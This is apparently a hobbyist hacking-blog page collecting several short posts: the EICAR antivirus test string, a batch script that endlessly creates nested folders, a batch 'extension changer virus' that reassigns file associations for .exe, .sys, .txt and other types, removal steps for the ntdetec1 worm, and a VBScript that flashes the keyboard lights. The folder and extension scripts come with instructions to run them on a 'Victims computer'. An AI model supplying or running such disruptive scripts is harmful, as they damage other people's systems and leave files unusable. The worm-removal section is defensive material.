After a long time i m backing for virus writing and also writing a post this time not only one virus but we are going to make 8 new viruses that are very very hazardous or troublesome. so now don't try it on your PC just make it on Virtual PC or your test PC if you have it.
Read More>>
Virus
Anti-virus are very vital thing that we all of them uses from an beginner user of a computer to a expert. but always we keep our anti virus updated but their come some problems in our pc and we think that its not an virus because our antivirus is updated and perfect but you are wrong their sometimes comes that antivirus doesn't detect a virus if its known virus also. their are many reasons for it but to test that your antivirus is working properly and it efficient to detect the virus i have brought you this code that helps you to test out your antivirus.
To test it Just Follow this steps :First Click on Start button.
- Then Open Notepad.
- In Notepad add the below code :
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
- Then go to save.
- Then Put File name as "FAKEVIRUS.EXE"
- Their Select "All Files"
- And Save it.
If this file got detected immediately ....that means your antivirus is working and updated.

Today i gonna show you how to make a batch file that creates a folder inside a folder & so on..
I know all of them are interested in making virus so once again i came up with new virus(not a virus but it's a batch file).
Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.
1. Just open up a notepad, copy and paste the below code
cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop
2. Save it as folder.bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currently logged in username.
3. Then run it on the Victims computer to infect it.
4. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.
Feel free to share your fellings in comments.. : )
Credit : http://hacking2all.blogspot.com/

Here in this article i came with Extension changer virus today i am gonna showing you how to change an Extension of an files.
What is Extension changer ?
Assume that all images (*.jpeg, Gif etc) are by default opening with "Windows Picture and Fax Viewer" but in this article this will change to some other application as you wish for ex: .mpeg application so that it cannot be opened in this way you can disable opening of jpeg application.The source code & step by step procedure is as follows.
1. Open a Notepad and copy and paste the below code
@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit
2. Save it as anyname.bat, and now you are ready to go…
3. Execute this on Victims computer
This Virus File will change the native extension with some other extension and makes them unable to open the file unless they know how to deal with it…
The above program replaces all the text files [.txt] with the extension [.jpeg], and likewise….
Pass your comments about this article..
Credit : http://hacking2all.blogspot.com/

This is a really great video tutorial which will help you to shutdown a PC or Computer or laptop just by sending a SMS to an Email Account. This functionality is great as you can send a SMS from your College etc and shutdown your PC which you had assigned to do some work like scan for viruses online during you were in College…. Have a Look
Shutting Down a PC or Laptop with a Cellphone / Mobile SMS
Enjoy Cool Hack...........
If you’re using the Operating System called Windows, chances are that you might have already come across the ntdetec1.exe virus. Or you will, sooner or later.
Its official name is W32.Ceted and it is a worm that copies itself to all shared and removable drives and spreads when the user double clicks on it to open it. If a system is infected, it creates a folder called ntdetec1 in your System Drive which is NOT visible via Explorer or Command prompt.
Related files:
\ntdetec1\ntdetec1.exe
\ntdetec1\cmrss.exe
\ntdetec1\run.exe
\ntdetec1\shell32.exe
\ntdetec1\drivelist.txt
\ntdetec1\child\autorun.inf
\ntdetec1\child\ntdetec1.exe
Symptoms:
1. Task Manager closes as soon as it launches.
2. RegEdit may be inaccesible
3. Folder Options may be inaccessible
When I scanned using some anti-virus software, Nod32, Symantec
AV Corporate, McAfee and AVG failed to detect the files, even in Safe Mode.
To remove it, run the following commands at the command prompt:
taskkill /im cmrss.exe
taskkill /im ntdetec1.exe
taskkill /im shell32.exe
Now, make sure you are in the root drive of your system. For example, if your Windows in installed in C:, make sure your prompt shows C:\>
Now, run the command..
attrib ntdetec1 -s -h -r /s /d
(s->system,h->hidden,r->read only)
This will make the folder visible in explorer. Now you can Shift+Delete the folder from explorer.
Also, you might need to delete the following registry key (if it is present)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\ Run\"winlogon" = "C:\ntdetec1\run.exe"
Congratulations, this will remove all known traces of the above worm.
And remember, next time you use someone’s PD, before you access it, goto your command prompt and delete the autorun.inf file if any
Friends this is just a small trick that will just make your dance means its lights will go like disco lights of a midnight club.your keyboards light goes in rhythmic way it too cool u try and make fun .These codes when executed makes your Caps, Num, Scroll lock keys flash..
very cool...i hav tried it...
1.This piece of code makes ur keyboard a live disco...
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
2.This one makes it looks like a chain of light....
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 200
wshshell.sendkeys "{CAPSLOCK}"
wscript.sleep 100
wshshell.sendkeys "{NUMLOCK}"
wscript.sleep 50
wshshell.sendkeys "{SCROLLLOCK}"
loop
Instrcuctions:
*paste any of the two above codes in notepad
*Save as "AnyFileName".vbs
*Run the file
*to stop, launch task manager and then under "Processes" end wscript.exe
I hope u would like it...






